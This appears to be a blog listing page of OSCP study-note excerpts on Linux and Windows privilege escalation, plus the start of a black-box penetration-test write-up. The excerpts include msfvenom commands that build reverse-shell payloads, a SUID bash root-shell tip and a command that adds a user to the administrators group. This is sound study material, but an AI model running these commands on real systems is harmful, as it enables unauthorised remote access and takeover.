PrivEsc

Privilege Escalation on Linux

Dec 6, 2020 tips linux PrivEsc

OSCP Notes Tools for enumeration PowerUp (https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1) sharpUp (https://github.com/GhostPack/SharpUp) - Useful when powershell is not available sharpUp - Pre-compiled …

Privilege Escalation on Linux

Dec 6, 2020 tips linux PrivEsc

OSCP Notes Find executable files with suid or sgid bit set Example: If you have /bin/bash with such permissions, you could easily spawn a root shell with -p option msfvenom command to generate executable elf file for reverse shell 1$msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf …

Privilege Escalation on Linux

Dec 6, 2020 tips windows PrivEsc

OSCP Notes msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe Adding user to Admin group - net localgroup administrators <username> /add PsExec tool - to escalate from admin user to full SYSTEM privs - …

Relevant

Oct 3, 2020 Windows PrivEsc IIS

Scope of work The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you …